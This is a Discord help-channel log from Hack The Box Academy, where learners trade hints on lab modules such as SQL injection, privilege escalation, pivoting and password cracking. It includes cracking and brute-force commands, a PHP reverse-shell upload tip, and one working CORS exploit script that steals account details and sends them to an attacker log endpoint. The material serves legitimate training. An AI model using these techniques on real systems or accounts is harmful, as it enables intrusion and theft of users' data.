#modules

Will try. Thanks

Both US academy I and II don't help. EU maybe?

I'm on EU 1, EU2 kept giving me time-outs

EU 2 gives more info:

PING 10.129.225.46 (10.129.225.46) 56(84) bytes of data.
From 10.10.16.1 icmp_seq=1 Destination Host Unreachable

DM me

Hello!

I am currently stuck on the Skills Assessment of SQLMAP Essentials.

I have already found the issue with the user-agent. Unfortunately I can’t get any further. Probably missing the correct tamper script..

Thanks for any help.

Try using a popular tamper script maybe?

I did but i could not find the right lne

One

What command did you tried?

Hi, I am working on the PowerView module, I am stuck on this question " Find the member of the Remote Management Users group on WS01." There are no users on Remote Management group to be associated with WS01. Can anyone give me a nudge ?

Ok, now I've started Windows Privilge Escsalation Skills Assessment Part I and got a foothold, but runnning lazagne, juicypotato and printspoofer don't work. Any hint for the ldapadmin password and the priv esc questions?

Can anyone provide a nudge on Broken Authentication - Skills Assessment?

I managed to ||login as support.us|| I have also discovered that the ||token is two MD5 hashes separated by a colon|| but I am not sure what to do from here on out...

@naive ravine crack that md5 hashes and see the format they use , maybe you can abuse it

Hi everyone, I’m new in HTB. Yesterday I was trying to finish the first “practice” of metasploit module but I’ve got sucked .
I was doing as follows: msfconsole, search eternalromance, use 0 (the correct one), and set RHOSTS (I’ve set the right one). All was running well but I didn’t get the shell, and I think it’s bc the LHOSTS it’s pointing to the local, no the vpn. How can I set the vpn instead my local ip? In the openvpn file I have the private key, and the public (I think, but not ip). I would appreciate any help

you can either check the ipv4 of your vpn with ip a. The vpn is usually tun0. Or you can set lhost sraight to tun0

Thanks, I will try!

It worked

Hi again, I’m a little clumsy 😅 I’m trying to find the flag.txt in the windows desktop but I can’t make it. I’ve type whoami and got nt authority\system. If I make a cd desktop or C:\Users\authority\Desktop I can’t get the desktop

afaik, nt authority\system is always named Administrator on windows

Check the C:\Users with dir command.

Ok… found it. cd C:\Users\Administrator\Desktop.
But know, when I type flag.txt enter nothing happen.
Somebody else had the same problem?

Wow man, I’m soooo clumsy. type flag.txt and done😅

Anyone available for Windows Priv Esc Skills part I ? After getting foothold?

THink they changed the box been working that crap for 3 days now

jarednexgent recommended running printnightmare which is another privescalation tool he said worked for him had not tried it yet but fixing too

Awesome, I'll go give that a try rn!

and ya its a feature of the box not an error. Its got a firewall that drops ping request

if you find anything let me know too Im working on the same things as you are right now

https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527

You need to be auth. I still have no creds... !

hey, did anyone else solve this?

I did

What am I doing wrong? I get NTSTATUS: STATUS_LOGON_FAILURE no matter what I do.

you can dm me

Module: Pivoting
Section: Netsh.exe
Problem:
Set up the port forward with netsh.exe using an admin powershell. All looks to be working, but the victor credentials are rejected as incorrect.
I tried xfreerdp and rdesktop with no success.
Also tried specifying the domain as inlanefreight.local, but then get the following error:

"We can't sign you in with this credential because your domain isn't available. Make sure your device is connected to your organization's network and try again. If you previously signed in on this device with another credential you can sign in with the credential.

Oh, and I've confirmed the proxy is set up by a quick nmap from attackbox to pivot host which returns a http proxy on the port.

Does anyone have any advice for Password Attacks: credential hunting in Linux? I've tried brute forcing multiple services, but so far no luck.

Try changing the VPN you are connected to. You can find VPN settings in your Academy account. Feel free to DM me if this issue persists.

can someone spare the time to help me with a question? I've been stuck on Broken Authentication - Reset Token for some time now and I feel like I'm going bonkers, I'm sure my script is wrong.. was wondering if somebody can point me into the right direction 🙂

Hello, I am trying to get the 5th flag on Linux Privilege Escalation Skills Assessment. I upgraded my shell using the python 3 command, but I am still unable to execute the command to escalate my privileges. Can anyone assist me?

Module: Pivoting
Section: RDP and Socks
Problem:
I am able to get the SocksOverRDP .zip onto the host, and I then expand the .zip and find the .exe and .dll. Then I run the regsvr32.exe, and get an error about the dll not existing, and look again and the DLL has disappeared...print out from cmd below:

UPDATE to the above: Defender is your enemy

wow question was sorta misleading I spent an embarassing amount of time trying to figure out what the role was

spoiler alert

Hi, I'm doing the File Inclusion module now and am on the Remote File Inclusion section. I can't answer the question at the bottom of the page because the container isn't giving me a port, just an IP. No response from ping, nothing on port 80... Bit stuck and I've tried respawning it a bunch of times

hey guys in module section of using metasploit module, ive got a shell but how do i get the flag file off of the admins desktop/

Search via meterpreter

Read this, it helps : https://www.offensive-security.com/metasploit-unleashed/searching-content/

Or directly drop into an interactive shell, and then conduct your search

thanks, i did search -f flag.txt and got a path, just gonan cd to it now and open

anyone available to help me on the pivoting skills assessment??

Hey everyone

Question
On Information Gathering - Web Edition , Section is Active Subdomain Enumeration
It asks me this 10.129.69.147

• 1 Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.
  But i cant do anything with that. I have put the inlanefreight.htb in the etc/hosts but still cant do anything with this

I'm really unfamiliar with 'awk', can someone help me create a set of rules to modify a password text file with the following rules: start with capital

One lowercase

end with digit

The password must contain at least one special char: $ # @

20+ Characters, less than 29

Hi, Guys. Hope you are having a wonderful day! I would like to get some help with "Password Attacks - Password Mutations" Task. Thank you

In the Attacking Common Services module, Attacking RDP, question 2 is something wrong? I wrote the key but I get an error. (As you can see I answered the other questions)

Any nudge on the Broken Authentication Skill Assessment, do I really need to parse the 'more than 20, less than 30, starts with capital letter, ends with number' passwords from the recommended Rockyou.txt file? I'm attempting to do this, but could use some help on it, or know if I'm completely off the track

that question is asking for the key name not the key path

I also wrote just the key name. Also error

hi! i need some help with broken authentication module. DM me please.

I'm having the same problem. Have you been able to solve it by any chance?

@tiny ledge yes we will need to filter the rockyou.txt file to find the password for the support.xx user

@agile bloom have you followed the directions on GTFOBins for busctl?

@fair cove try doing a zone transfer with dig axfr . If you need help feel free to DM 🙂

i'm on the windows fundamentals skills assessment. i'm literally looking at the SID of the security group i made and it's saying error

Ah thanks mate. Just wanted to see if I had done anything wrong with my etc hosts

i can't find a video walkthrough for this part and i'm baffled

@quiet prism DM me

added

hi, can anyone help me at sqlmap essentials at : Running SQLMap on an HTTP Request, question 2?

Hi

Anyone have knowledge on installing cyberrange kypo?

DM me
With your attempts on the matter

hi all. just started doing modules. excited about it but now that i'm older my cli font size is its own security hazard. everyone can read it

any idea what's wrong? htb says my vpn is connected, the machine is active but when i go to nmap says host is down

@west canopy yes I think so, can I DM you?

I have the directions but am not sure if I am following them correctly

hi , how did you manage to solve this ?

I didn't get it solved. I tried changing VPNs but it didn't work. I just left it and moved on in the hope it would start working in the future. I noticed the machines had updates which needed to be applied so thought perhaps there were some updates to be pushed?

How do brute force in the broken Authentication module? All the word lists shown are not something I've ever worked with

Hi , how did you manage to solve this ? it's something extra beside following the steps

anybody knows how to make money online

... Can you not spam the same question everywhere, especially when it's unrelated to this discord

Yep feel free to DM 🙂

Anyone able to give a little hint/help on the Footprinting: Hard Lab? I feel like I'm in. But I can't seem to escalate after getting ssh access :/

@trail pendant try connecting to the local mysql database 🙂

Anyone here that finished the Web Attacks final Skills assement? I found the ||event create function|| but literally every XXE attempt I do fails to reconnect to my local web server instance.

@rustic sage Try utilizing the technique shown in the middle of the "Local File Disclosure" section to read flag.php. If you get stuck feel free to DM 🙂

I'm having a little trouble on the AD Enum & Attacks Skill Assessment I. I was able to get the first 2 tasks pretty easily but now i'm kind of just stumped on how to get the users PW. Might just need to take a brain break, but any assistance or point in the right direction would be appreciated

Hello im currently in the academy module SQLI, i managed to read everything inside the database, but i dont understand the question.
do i have to look for a user in a table whose username is 'user()' ?

@buoyant escarp user() is a variable in the database. Try doing something like this but replace @@version with user():

ah to get the login name for the database itself?

Yes i believe it shows who is currently logged into the database

got it thx

@timber tide Try using PowerView to obtain the kerberos hash for the user, and then crack it with hashcat. For example:

I was trying that but PowerView isn't available on the webshell, or at least I can't find it? I tried to upload it but it crashes the webshell

when the backend is using php and mysql, and i use the # comment, basicly "....QUERY..." i have to set ";# so the string in php is not broken right?

Q.When you try to access the IP shown above, you will not have authorization to access it. Brute force the authentication and retrieve the flag(second last section on skills assessment).
Module : Login Brute Forcing
So I brute forced given IP after a google search reveal a get method
Got the credentials and tried login in with :
"ssh" however get his error ssh: connect to host 167.71.142.156 port 30930: Connection refused
"ftp" however get an inescapable terminal with no commands recognize
"curl" Doesn't give any results
"Firefox" Doesn't give any results.
If someone can tell me where I'm going wrong, I would appreciate it.

Can anyone offer me some help with SQLMAP essentials? I am having issues with Case #9 and trying to get past the UID wep app protection

nevermind I figured it out lol

@timber tide You will want to find a way to get a terminal based shell to progress further through the assessment.

@carmine lark DM me 🙂

Thank you, yeah that makes too much sense 🤣

Hello, Im currently in INFORMATION GATHERING - WEB EDITION/Active Subdomain Enumeration, I have a problem with the question of TxT i use dig and nslookup also I try the commands in the cheat sheet, can anybody help me please

Hi all, still having issues on the "pivoting" skills assessment. Anyone able to help?

Is it just me or doesn’t it make sense to have module specific channels under academy heading?….@ the mods

guys. what is wordpress simple backup pplugin vulnerability

I just spen 3 hours and got nothing

@mystic edge is this for the Getting Started module? You want to use the wp_simple_backup_file_read exploit , and in the options set FILEPATH to /flag.txt

Burp is such a fkn garbage, stop teaching ppl burp, stop doing modules with burp, just stop ffs

Hi guys, why can’t I attach files? The plus button on the left is greyed out and does not prompt anything when pressed

It's an ongoing competition, please respect and read the rules. 3rd party exchanging / seeking help is prohibited and a disqualification offence

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

you mean 18 above cant upload?

hi, anyone had any clue on this question in htb brute force module ? "Once you ssh in, try brute forcing the FTP login for the other user. You should find another flag in their home directory. What is the flag?" the other user i found was m.gates, however after generating wordlists using cupp with first name Melinda, lastname gates, nickname ann, brute force attempt using the wordlist wasnt successful, any directions or clue? hope for any help from y'all

@steep oxide Try running hydra from INSIDE the target machine (after you've SSH'd in.) There is a rockyou-10.txt wordlist there for you to use 🙂

@west canopy thanks for the clue...brute force machine within another machine is slow as hell😅

everyone here sir pls I need some help can anyone help me pls I am in a big trouble

call the police?

no sir I need a pro hacker to solve this problem trust me I am in a big trouble and idk how to fix it

pls sir help me🙏

🥲

doubtful, this isn't a discord to hire hackers, anything illegal will get you banned

go to the police

no sir like this is a discord problem

umm not really ig

then go ask discord's support

not working sir pls sir you guys my last hope I tried everything

then that's it, as you said you tried everything.

¯_(ツ)_/¯

🥲 so is it a yes sir?

so like should I tell my situation?

no it's over, you already did everything, that means it's impossible

🥲

yes let's hear it

just sir atleast try

🙂

well there was a girl who was a friend of mine I forgot her name she gave me a link where she told me like my brother made this game can you try it I clicked and she took my account and she took my friends account and most people think I did it and my old account have nitro that's it sir

contact

discord's

support

I did not working sir

what you're asking for is ILLEGAL and this is me asking you for the last time to drop it

thank you

so sir what should I do?

but sir the way she tricked me and took my acc that is more illegal

You can contact Discord for help and support issues through email at support@discordapp.com, via Twitter, or through various means within their help department.

so will it work sir?

but only one problem I forgot my old acc password💀

Can someone point me in the right direction on Broken Authentication Skills Assessment?

Do you know the password policy yet?
Read the page "messages.php" carefully.

If you keep getting stuck, write me a DM

What you fell to was a worm that utilizes discord, her account was already compromised when the message arrived to you that got your account. There are multiple versions of the "can you test this game" worm all working on the same principle on discord rn.

And yes very illegal

But for the guy who originally wrote the program

And deployed it

Windows Privilege Escalation -> Miscellaneous Techniques

I got the SYSTEM privileges, but it's not clear in the question what exactly it expects? The question there is "Using the techniques in this section, find the cleartext password for an account on the target host."

What account exactly?

I run lazagne, got all the dump with hashes for all users

nevermind, I've found one
hint for other: re-read the module again and again, the hint is there

dm if you still need help

quick question, does vhost always share the same ip?

Thanks very much, but I sorted it...was working off some spurious ping sweep results.

Hey guys

I need help at Linux privilege escalation module, at cron jobs part. I. Modified the backup.she file and opened a netcat but no respond. When I’m trying to open the backup file it says permissions denied..

Anyone?

I’m somewhat stuck on Password Attacks - Medium, I have an SSH session on one of the users, tried looking for credentials, cronjobs, backups, accessing the mysql db, brute forcing other users via SSH but they all seem like dead ends. Is anyone able to point me in the right direction?

I am stuck in the same place for 3 days now. I tried everything you tried and also checked logs, scripts, the other IP from .doc file and looked for vulnerabilities in smb (found a bunch of users with same pass) but no working results. Fell like giving up... 😞 Can someone give just a hint?

dm

dm

Hi, I'm new to HTB and HTB Academy. I want to learn pentesting on HTB Academy. With little IT knowledge, is there a list of modules to go through in order to go from zero-to-hero?

I desire an ordered list.

Hey, im a bit stuck with the file upload attacks skill assessment, could anyone help point me in the right direction?

Has anyone had weird problems with the meterpreter section of the metasploit module? The target's "time left" seems to go down waaay faster than it should. Like, it'll say 80 minutes then like 10 minutes later it's expired. The box itself also doesn't seem to want to play well

sad very sad :/

it worked now

need some assistance with the medium lab of footprinting. I have managed to get logged in via RDP and found the credentials for what Ithought was the sql database but not getting logged in.

dm me and I can help

There is another user on the system 😉

yes alex and Administrator

Exactly. The user Alex has no rights to access the database. So try it with the other user.

damn you know about this thing so can you help me

There is nothing that can be done

Discord support will help you

🥲

np but still thanks

i need help with the skill assessment of broken authentication 😐

DM me

are you still stuck on this question?

Which WAF is being used? (Format: <name>)
Im doing the osint and i couldnt see it in the source of inlanefreight.com so i tried to use Nmap to find it but i couldnt make it work. What tool should i use to find it?

could try wafw00f?

@limpid wharf it's on the front page of the website, top left hand corner. "Protected By Wxxxxxxxe"

I think it might show up on Wappalyzer as well

wow im the worst at osint haha wtf

thank you !!

lol np 🙂

Facing the same issue now

Damn didn't knew this behaviour existed, maybe contact htb site support,

anyone finished the LFI module?

im currently doing automated scanning section and using fuff to enumerate for parameters on the target but i cant seem to find it. the payload used was - ffuf -w /root/wordlists/parameters.txt:FUZZ -u 'http://<serverip>:<port>/index.php?FUZZ=value' -fs 2287

is there any error in the payload or am i missing something?

it will be in demand for a decent amount of time

demand is too high and the supply is very low

Good idea!

can any1 help with js code

Probably even more than now, we are moving more and more into technology, meaning more people will try to take advantage of it, so probably.

it says there is error on if (age)

To be fare it’s probably going to be less in demand because more people are going to do it 👀

what is the problem

I guess if you can do it good there is nothing to worry about

bruuuuuuuuuuuuhhhhhhhhh

Lol

just started to learn js

dont make fun of me )::::

yes

I tried to do c++ once, I had no experience with coding

It was a nightmare

thanks man

yeah

Why is it disgusting

Hm true

Nonetheless, its needed for a lot of triple a games

Which makes it in demand

I actually know one person who started coding with c and he gave up in 1 week

:DDDDD

in the university of course

it was not his choice

I hated when secondary schools skipped python

They would teach people how to use variables then went on to html

God I despised creating websites

FAAAAAAACTS

:DDDDDDDD

Then I had to watch indians on youtube

They helped so much

I learnt everything in 10 minutes compared to the term of python at school

anybody completed the LFI module? 😅

lol okay

Have you worked on ffuf module yet?

not yet but i was assuming the payload htb supplied in the section should do the trick

Solves everything flawlessly in ffuf module, just to suffer on 1st question in skills assessment

i need help with metasploit section Modules, i keep gettin a message saying "Exploit completed, but no session was created"

if you still need help, write me a DM

if anyone can assist with the web attacks skill assessment please pm

do i have a problem if i tried it 12 times now?

how the hell do i set up this machine woth open vpn ?

i am using linux and i want to set up this openvpn

@rustic sage is it possible you aren't using the right exploit?

linux @rustic sage

oh

backbaox

backbox

very possible, i don't no what i should be using TBH i just follow the Hack the box sections

openvpn yourusername.ovpn this is the first command should i put my isername from the web or pc ?

it's harder then you think, I am dyslexic

Hello

sudo openvpn <vpn_file>

Why am i not allow to send pics

verify yourself

#welcome

what is the right one if i may ask?

What section are you on?

Modules in METASPLOIT FRAMEWORK

Try using ||ms17_010_psexec|| if you haven't already

i have

did you set the LHOST and RHOST?

yep

that's all it needs

In the Web Proxies Module, particularly in BurpSuite Fuzzing. I have put a generic .html list as an input for the intruder but there's no answer at all. Can anyone help me on the steps on how to find the flag of that problem?

By no answer, I mean error 404 all the way

dm me

I'm stuck on question#2 of the Predictable Reset Token module. Can someone give me a nudge?

I've decoded the password reset token for the htbuser, but I'm not sure how this will help me login as the htbadmin user?

Hello, Im currently in INFORMATION GATHERING - WEB EDITION/Active Subdomain Enumeration, I have a problem with the question of TxT i use dig and nslookup also I try the commands in the cheat sheet, can anybody help me please (edited)

dm me ill give you a nudge

did you find all of the subdomain?

I’m on the Stack-Based Buffer Overflows on Linux x86 module and the Skills Assessment is giving me a headache. I’m making a payload using msfvenom and putting that into the python run command in gdb. But when I cat msg.txt, it doesn’t show me the flag as I would expect, instead having a bunch of arbitrary characters.

yes , I try host

Note: I’m using the read_file payload and not a reverse shell payload. Thought it took too much effort.

i mean did you find all of the subdomain for inlanefreight.htb, ||the flag is in one of the subdomain txt record||

yes and is not the flag

just dm me

Attacking common services module
SQL section
Unable to login with the provided credentials. Any pointers would be very appreciated! I keep getting "the login is from an untrusted domain and cannot be used with Integrated authentication"

hi can someone give a hint about Password attack Medium lab i have ssh session but i cant find any creds

hey guys. i have been tried to exploit CORS and i bypassed the origin by using this method :

Origin:https://vulnerabile-website.com
Origin:https://mylink-to-redirect-the-wite.com

i added second origin to bypass it . and it worked .
but here is the problem . i wanna exploit it by javascript . and this is the normal exploit :

<html>
  <body>
    <script>
      var xhr = new XMLHttpRequest();
      var url = "  https:/  /ac211f241efad372c645255700030006.web-security-academy.net"
      xhr.onreadystatechange = function() {
        if (xhr.readyState == XMLHttpRequest.DONE){
          fetch("/log?key" + xhr.responseText)
        }  
      }  
  
      xhr.open('GET', url+ "/accountDetails",true);
      xhr.withCredentials = true;
      xhr.send(null)
      alert(xhr)
    </script>
  </body>
</html>

but as you can see there is only one origin request is listed here . but how i can send the secend one to use the method i used up , here ?
i cant just write the source twice . i need it to be in one request not tow !

are you login with ||dennis|| via ssh, if so ||check his ssh key it can use for something else||

no im still in j user i cant find any creeds for dennis

ohh check what service is running on that box

um hey guys quick question

im doing a module on metasploit and when i launch the target it's not even able to ping it, is that normal?

cant access the webpage either

Try to reset the target
And then troubleshoot any network issues

can i dm;

Pings would be disabled from target host, so try nmap with -Pn switch to quickly check for host availability and port too. Next thing is, there maybe non-standard ports. Leave no stone unturned

sure

okay so my network is fine, when i go to the webapp the browser is unable to connect, nmap scan with -Pn just stays blank

https://academy.hackthebox.com/module/57/section/516 in the first question, what is the name of employee

Hi all! I'm having troubles with ZAP's hud. When I try to do the hud tutorial or just follow along to the modules in general, I can't use any of the functionality of the hud what-so-ever. This is true for both my local vm of parrotOS and the pwnbox on academy. Has anyone had the same problem and perhaps have a solution?

Thanks! 🙂

Try to identify the open ports and then connect to it. If everything tried fails then take rest / break and come back to it later. Once you're back to it and still fail then contact HTB support from that chat box icon

yea i left came back and it takes pings now so i assume its up , many thanks

Hey I was doing the Web Proxy module and inside of that ZAP Scanner, I was supposed to find a flag which can be using the ZAP Active Scanner as a remote code injection.

I had to delete a space at the end of my flag for it to accept it.

Oh yeah I got it as well

have you done the skills assesment thing at the last of the module?

@white mulch I'm doing that now actually

I'm stuck actually

I was gonna ask you if your zap hud works as well

dm me 😛

Yeah

I have dm'ed you

We don't/can't do that here

Guys, I'm trying to download the file winPEASx64.exe for window priviledge escalation but all of my browsers refuse to download it, thinking there's a virus in it. I then tried to download it using the command line with wget but I still have the same message that it potentially contains a virus

I haven't tried the module yet, but maybe you can upload the bat file?

It is in the StartingPoint - Archetype, so technically not a module of the academy

hello guys

i am doing the login brute forcing module, and it is the first page of the skills assessment.. i manage to get the first flag, but when i am trying to brute force the admin_login.php i am getting a lot of username and password matches, but none of them seem to work.. could someone give me a clue?

Then your hydra command is probably not correct.
You can DM me if you need help.

I'm stuck on the SMB practical in the attacking common services module -- I can't find the wordlist it's referring to

Hi guys im currently working on Attacking web applications with ffuf im trying to get the parametersthat would be accepted on a page but after fuzzing i get no hits any help will be appreciated!

delete the flag plz

Hey All, i'm stuck at the AD Enumeration & Attacks skills assessment 1 - Getting the flag on the Administrator desktop on MS01. I pulled the user accounts from the WEB box and attempted to crack their hashes, only the user in the previous questions was cracked. I'm stumped on how to access or get a shell on MS01. Any push in the right direction would be appreciated

No mate managed to get through. Thanks for checking!

dm

you can DM me

What question exactly are you on?

Hello, i am very new to hacking and i recently decided that i wanted to do one. And i haven't found any tutorials on how i can learn to do that. If anyone here can help me i would appreciate!

For Footprinting SMTP module, would smtp-user-enum be the intended tool to enumerate the users? I'm using that, but is there a more efficient way or a different intended way to find the username on the system?

How you did not find tutorials?
Have a look around on Youtube.
IppSec, The Cyber Mentor, Jhaddix, NetworkChuck, David Bombal, John Hammond and these are just a few that come to mind off the top of my head.

Oh, thank you payload!

Yes, you can find the user with smtp-user-enum.
I wonder if there are better ways? No idea. smtp-user-enum has led to the goal.

and take a look at the Starting Point.
https://help.hackthebox.com/en/articles/6007919-introduction-to-starting-point

Thank you.

thanks

uh.. xD

wrong tag

the perfect tag

thanks anyway youknowwho

Could I have some help on the wordpress skill assesment???

Sure, where are you stuck? You can write me a DM

I mostly am just confused on what vulns to exploit.

I have been reading POC's from wpscan and I need a little nudge

Have you performed a WPScan with token? Then it should show you a plugin that is vulnerable.

YEs. I have been using my own api token.

There are just lots of vulnerablilities in the plugins

Nvm. Give me a sec

I will try a little bit more on my own

I think I found something

@acoustic owl hey

Hi

Can someone please help me with Question # 2 in Bruteforcing Cookies?

The lesson implies that we should use CyberChef and/or Wikipedia's list of File Signatures to solve this, but its not clear how we actually ID the encoding method used. Are we supposed to randomly apply recipes to the token in CyberChief and hope to get lucky? Also the Decodify tool can't crack it, and the token seems too long and complex for JohnTheRIpper to work in a reasonable amount of time...

Can i ask something?

sure

I want to start hacking from start can u guide me please?

Is Berlin your home? Then we can speak German.

No, am just the fan of berlin character in Money Heist 😅

My way led me via Udemy (networking, Linux, Python, web development) to TryHackMe and from there here to the Academy.

Get familiar with linux command line first

Get familiar with how web apps work

Get familiar with Active Directory

Get familiar with Networking

Then Do HTB academy

Ok, Thanks

Throw in python while you're at it

and maybe some Assembly

If you need any tips @rustic sage you can dm

man i feel overwhelmed just thinking about it

I have no college experience or industry experience so this stuff can be a little rough!

Yea the amount of stuff you need to know just to get started is massive. And all of that is barely scratching the surface.

That is unfortunately the case. Although, I've always enjoyed learning new things so far.

If I want to specialize in pentesting a business, what should I focus on?

I think Active Directory should play a pretty big role. Take a look at OSCP. This is a exam that is often required.

If I complete the pentest path, will I be ready to do the OSCP?

No idea. I think it needs more for the OSCP.

My goal currently is to complete the Jr. Pentester path and then the Active Directory path.
After that I would like to do a few Pro Labs.

Maybe there is someone here who has the OSCP and can tell you more about it.

Hello everyone, a little confused on getting started: nibbles-intital foothold. I am having issues translating what I am supposed to do in the lesson to the actual Pwnbox. Any hints would be greatly appreciated. Took 3 days off so a little rusty on where I am at

@ebon pine we want to upload a file to "My Image" but it's actually a php script containing a reverse shell

so just to make sure; go into sublime txt or something similiar put the below from the cheat sheet in with the appropriate ip and save it as a.php file and upload

yep , will just need to change the IP address and port to match your machine

my apologies, and I really appreciate you helping out; am I matching my machine in that or the target machine and how do i ensure I am putting the port;

would it be more appropriate to Dm you?

your machine, not the target machine. A reverse shell will make the target machine connect back to you (which is why we provide our own IP and port)

that makes perfect sense

thank you!

np 🙂

I'm stuck on the second question of weak brute force protections in the broken authentication module, could anyone give me a push in the right direction?

nevermind, i got it

Hey guys, can I get a nudge on getting the admin email for the imap/pop3 section of the footprinting module.
I've connected to the imap and pop3 servers with both curl and openssl s_client with the user robin, and using list and stat has shown that robin has no emails in INBOX as well as the DEV box. I have some usernames that I verified during the smtp section before which can be the admin user, so am I to use the verified usernames and bruteforce the password? Or does robin's email server contain a message that I haven't been able to find?

My current guess is it has something to do with the capabilities

Just reading through some of the RFC's

Could I please have some help with Password Attacks: credential hunting in Linux? I think I need to brute force ftp or ssh, but when I do I don't find a valid login. I've tried both files from the resources section and kira as the username with the password file as the one from the resource section.

Took a break, came back, and now I can see TAG "1" UID. Now I guess it's time to dive into a vid about imap/pop commands

@pine cargo yes the imap commands are pretty clunky. If you need help i might be able to assist so feel free to DM me 🙂

Thanks for the offer! Though I just got it, the imap list command should list if the box has any emails or not. I skipped the ||correct|| box since I thought it was empty and was in the impression that I was looking for the artifacts of a deleted email or draft or something

Now I'm just irritated I didn't find it sooner, seems so easy to find in hindsight

sweet! nice work !

CryptoAnar84

how to found admin password of nibbleblog

Any chance of a nudge for the "Attacking Common Services" medium skills assessment? Is it just a matter of brute forcing with the lists provided by the course?

The lists provided by the course will not help you.
You need to find a username and then bruteforce it with its own list.

Any hints on finding the username? I've tried enumerating pop3 manually but that won't work. I've also done a zone transfer but haven't found any reference to a user name on there...where should I look?

do a NMAP scan. Is there a port that stands out? Take a closer look at this service.

The key is all ports. Thanks.

Why am I having so many issues with Active Subdomain Enumeration... Always NXDOMAIN and other errors... It's almost like I can't hit anything, but I can

Does anyone have the code to parse the password list for Broken Authentication - Skills Assessment, I cant figure out how to modify the rockyou list

You need to find out the password rules. Then apply the filters to the rockyou.txt list exactly as shown in the course.

I found the rules, but the Rockyou.txt list is messed up as it it with all the 'links' 'emails' etc. Even if I remove everything more than let's say 29 characters, the links remain in the text file. Also if I apply capital letters to all the words, it somehow removes all the entries

Maybe you need to download a fresh rockyou.txt.
Actually it should not have links and emails in there

https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases

Doing the Vulnerability Assessment module. The VMs are insanely slow and disconnect all the time. Anyone else have this problem as well?

Thanks, I'll try this

hi guys, about HTB hashcat module, hybrid mode section , Question-'Crack the following hash: 978078e7845f2fb2e20399d9e80475bc1c275e06 using the mask ?d?s.' ; I've hashid the hash and found the hash type to be 160, nano the hash into hybrid_hash, and use this command "hashcat -a 7 -m 160 hybrid_hash '/home/wilsonchuah/SecLists/Passwords/Leaked-Databases/rockyou.txt" but an error of "no hased loaded appear", any clue where went wrong?

@steep oxide your hash mode number is incorrect, it's not -m 160

i tried 100 as well for SHA1 it didnt work too, for the others hash type mostly i couldnt search the hash type numbers

Any tips how to make changes with AWK, so it deleted all entries where last character is not digit

Though this didn't work, this is how you use a mask attack

Kinda confused that it didn't work, but I'm guessing that the mask isn't only ?d?s

ive got it worked using this command ; hashcat -a 6 -m 100 978078e7845f2fb2e20399d9e80475bc1c275e06 '/home/wilsonchuah/SecLists/Passwords/Leaked-Databases/rockyou.txt' '?d?s'

thanks anyways😀

lol, I've gone 9 ?a's long in bruteforcing

hashcat and password cracking are things where hackers benefit with a better system, either that or aws

awk '/[^a-z]$/ {print }' file

^This prints it into stdout

To make changes to file do
command > tmp && mv tmp file

This would delete original file

otherwise you could also redirect to a new file with
command > newfile

Nevermind, forget that,
awk has the -i feature

You can do
awk -i inplace '/[^a-z]$/ { print }' input

^Single command to modify the file

Hi all, I think I "cheated" on the common services hard lab. I managed to get system without using RDP at all and without taking over anyones account as is suggested by the second last question. If someone knows the "correct" solution for this box could you DM me and let me know?

I am stuck on the "What does the Linux PAM acronym stands for?"

I found the answer

but the system keeps saying it is incorrect

:/

It doesn't have

and I found the answer

I was too formal

||Linux PAM stand for Linux Pluggable Authentication Modules||

instead of

||Pluggable Authentication Modules||

It worked

That was the correct answer

the "correct" solution is ||Impersonate a users in mssql||

Haha, I guess it was the intended way 💩

Hello, i have problem with File Inclusion Skills Assesment, only what i get it is Invalid input detected? Somebody have idea what is wrong?

Need help on the FOOTPRINTING module - DNS section: Can’t brute force the host which ip end with 203

anyone here finished the lfi skills assessment?

Take the smallest list under Seclists
If you don't find anything, use the next bigger list

HTB Vulnerability assesment. Nessus skill assessment.
Connected to Nessus and I can’t do anything. Any ideas? (Using workstation)

Yeah, dm if you want

Take a look at the source code (PHP)

on mysql esentials on the OS Exploitation section i have a problem with the second question. i can create an interactive os shell but i cant find the other flag

hey guys can anyone help me withthe file upload attacks > type filters . i get the " image (link to the uploaded file) cannot be displayed because it contains error

Is it one of the subdomains-top1million lists? Or should I try the other ones?

The smallest list there contains 5000 entries. That is too much.
Try other lists

feel free to dm me if you are still stuck

There are only two wordlists under DNS that are smaller than 5000 and neither works… most other lists have way more than 100000 words

Have you found the zone?

I’ve done the zone transfers but there’s clearly something I’m missing since I don’t get how that’s related to the question I haven’t completed

#rules rule 5, keep it English

hey guys, any of you encounter this when compiling zip2john , it says "fatal error: arch.h: No such file or directory", how do i solve this? i need it for the hashcat module question

ive got the zip2john.c file from here https://github.com/openwall/john/blob/bleeding-jumbo/src/zip2john.c

Did you get an answer to this? I'm at the Socks tunnelling section and those credentials are not working for me either...

@paper crag @shadow verge try it with the US 1 VPN

No need i have completed the module i was asking for someone asking for help

Any tips using ' sed ', I need to delete all the lines not containing a special character '$ # @'

I did not get answer to the problem, when I did the module everything was fine, so the Payloadbunnys solution, might work with you.

@acoustic owl can I DM you?

sure

You can DM me if you are still stuck.

hi every one i've a doubt with the module "Network Enumeration with Nmap"
sudo nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0

this command not working and I dont understanding why.
this is the answer
setup_target: failed to determine route to 10.129.2.28

I completed that module and never needed anything that complex

do you have an IP assigned to tun0?

i'm curious for two reason:
1- because i'm studing and i would understand
2- i'm stucked in evasion medium lab and i'm trying to figure out the solution

yes, sure

dm me and lets discuss it more where we wont give anything away

ok thanks

Hello world !!

I have a problem with the intro to Network traffic analysis.

What addressing mechanism is used at the Link Layer of the TCP/IP model?

It's MAC but I can't valid this answer.

Can you help me ?

@vagrant latch DM me 🙂

Ok.

getting started

module

the "List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file."

I need help

I use the
smbclient -N -L \\\\<ip> >smbclient \\\\<ip>\\users>smbclient -U bob \\\\<ip>\\users

then I get the error "session setup failed: NT_STATUS_LOGON_FAILURE"

every fucking time

even restarted the IP adress

multiple times

and followed the same process

use forward slash

\ is for skids

after this? smbclient -U bob \\\\<ip>\\users

@pallid breach just tested on my end and I'm not experiencing issues. Your command looks correct.

it is...

Are you working from a VM or using pwnbox?

same thing as you

parrot os in vmware workstation

Try using the pwnbox, it's the built in browser baseed parrotOS

thats what i just used now

too much fucking around and I already used the 1 instance for today

I once had a weird issue on Footprinting Medium Lab. I work from a kali VM and i could not transfer files off the SMB share that I had to access to finish the section.

but from Pwnbox it worked fine.

ok
